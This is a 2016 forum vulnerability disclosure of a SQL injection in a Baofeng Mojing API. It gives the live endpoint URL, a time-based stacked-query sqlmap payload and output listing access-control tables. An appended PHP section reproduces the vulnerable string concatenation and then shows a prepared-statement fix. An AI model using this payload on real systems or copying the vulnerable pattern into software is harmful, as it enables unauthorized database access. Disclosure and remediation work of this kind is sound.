HanDs
Administrator

[July vulnerability disclosure] A 暴风墨镜 (Baofeng Mojing) site has SQL injection / 59 tables / access-control database



I had been planning to do a women-themed series these days, but tonight this hole came in instead.

Details:

http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC



This should be an API endpoint of the app; the traffic was intercepted by packet capture. Ran sqlmap with the UA attached: stacked-query injection.



Some info:



---

Parameter: cpu_hardware_model (GET)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#

---

Proof of vulnerability:

23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)

[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times

[01:26:57] [ERROR] invalid character detected. retrying..

[01:26:57] [WARNING] increasing time delay to 3 seconds

59

[01:27:22] [ERROR] invalid character detected. retrying..

[01:27:23] [WARNING] increasing time delay to 4 seconds



[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

acl_menu_url

[01:31:14] [INFO] retrieved: acl_permissions

[01:34:51] [INFO] retrieved: acl_resources

[01:37:40] [INFO] retrieved: acl_roles

[01:39:17] [INFO] retrieved: acl_user_to_role

[01:43:24] [INFO] retrieved: acl_users

[01:44:16] [INFO] retrieved: android_ba

Fix recommendation:

Filter the input. The vendor is so cold; could they send a gift?


暴风
Post #1
Posted: 2016-7-9 | Views: 0 | Replies: 0
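A worked example of the fix, added here as an illustration and not the vendor's code (the page does not show testing.php). The handler shape is an assumption drawn from the URL's parameter names and from the payload closing a quoted value with `');`: the endpoint is taken to store the seven GET fields with an INSERT into a table called device_test; the column names, DSN and credentials are placeholders. The unsafe function reproduces the concatenation pattern that lets the reported payload run as a second statement; the safe pair shows why "filter" alone is not enough: validation narrows what reaches the database, but the prepared statement is what stops the value from being parsed as SQL at all.

```php
<?php
// Added example (not the vendor's testing.php, which is not on the page).
// Assumptions: the endpoint stores the seven GET fields with an INSERT into a
// table here called device_test; the column names, the DSN and the credentials
// are placeholders. The "unsafe" function reproduces the pattern that makes the
// reported payload work; the "safe" pair is the recommended replacement.
declare(strict_types=1);

// Vulnerable pattern: values concatenated into the SQL text. A value such as
// "Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))x)#" closes the
// quoted string and the VALUES list, and the trailing "#" comments out the
// rest. Stacked execution additionally needs a multi-statement API, which is
// assumed here (mysqli::multi_query; PDO with emulated prepares behaves alike).
function insertTestResultUnsafe(mysqli $db, array $q): void
{
    $sql = "INSERT INTO device_test (mobile_brand, mobile_model, image_result, sound_result,"
         . " telecom_operator, cpu_instruction_model, cpu_hardware_model) VALUES ('"
         . $q['mobile_brand'] . "','" . $q['mobile_model'] . "','"
         . $q['image_result'] . "','" . $q['sound_result'] . "','"
         . $q['telecom_operator'] . "','" . $q['cpu_instruction_model'] . "','"
         . $q['cpu_hardware_model'] . "')";
    $db->multi_query($sql);
}

// Hardened version, step 1: validate shape, type and length. This is the
// "filter" step; it limits what reaches the database but does not by itself
// make the query safe, which is why step 2 is still required.
function validateTestInput(array $q): array
{
    $str = static function (string $key, int $max) use ($q): string {
        $v = $q[$key] ?? null;
        // Printable ASCII only, non-empty, bounded length; rejects arrays too.
        if (!is_string($v) || $v === '' || strlen($v) > $max
            || !preg_match('/^[\x20-\x7E]+$/', $v)) {
            throw new InvalidArgumentException("invalid $key");
        }
        return $v;
    };
    $int = static function (string $key, int $min, int $max) use ($q): int {
        $v = filter_var($q[$key] ?? null, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => $min, 'max_range' => $max]]);
        if ($v === false) {
            throw new InvalidArgumentException("invalid $key");
        }
        return $v;
    };
    return [
        'brand' => $str('mobile_brand', 64),
        'model' => $str('mobile_model', 64),
        'img'   => $int('image_result', 0, 1),
        'snd'   => $int('sound_result', 0, 1),
        'op'    => $int('telecom_operator', 0, 9),
        'isa'   => $str('cpu_instruction_model', 128),
        'hw'    => $str('cpu_hardware_model', 128),
    ];
}

// Hardened version, step 2: a prepared statement. The SQL text contains no
// user data; each value is bound by name, so quotes, ")" and ";" inside
// cpu_hardware_model are stored literally instead of being parsed as SQL.
function insertTestResultSafe(PDO $db, array $q): void
{
    $stmt = $db->prepare(
        'INSERT INTO device_test (mobile_brand, mobile_model, image_result, sound_result,'
      . ' telecom_operator, cpu_instruction_model, cpu_hardware_model)'
      . ' VALUES (:brand, :model, :img, :snd, :op, :isa, :hw)'
    );
    $stmt->execute(validateTestInput($q));
}

// Connection with server-side prepares: the statement is sent to MySQL
// separately from its parameters, and the binary prepared-statement protocol
// accepts exactly one statement, so a stacked query cannot be smuggled in.
function connect(): PDO
{
    // Placeholder DSN and credentials (assumed, not from the page).
    return new PDO('mysql:host=db.example;dbname=app;charset=utf8mb4', 'app', 'PLACEHOLDER', [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Usage in the endpoint (values arrive in $_GET, as in the reported URL):
// insertTestResultSafe(connect(), $_GET);
```

Two points of the design are worth noting. The validator deliberately still allows quotes and parentheses, because the original values ("ARMv7 Processor rev 1 (v7l)") contain them; rejecting SQL metacharacters would break legitimate input and would not be a reliable defence anyway. Turning off PDO::ATTR_EMULATE_PREPARES matters for the stacked-query case specifically: with emulation on, PDO builds the final SQL string client-side, and a multi-statement-capable driver could still run more than one statement from a query that did not use bound parameters.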